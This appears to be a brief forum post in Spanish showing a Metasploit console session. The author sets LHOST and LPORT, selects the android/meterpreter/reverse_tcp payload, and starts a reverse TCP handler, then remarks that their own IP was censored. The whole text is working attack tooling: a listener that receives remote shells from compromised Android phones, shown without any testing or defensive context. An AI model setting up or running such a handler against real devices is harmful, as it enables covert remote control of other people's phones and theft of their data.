
EL CODIGO:
msf exploit(handler) > set LHOST 10.x.x.xx
LHOST => 10.x.x.xx
msf exploit(handler) > set LPORT 9234
LPORT => 9234
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > exploit
Started reverse TCP handler on 10.x.x.xx:9234
Starting the payload handler...
msf exploit(handler) >
PD: He censurado mi IP por motivos de seguridad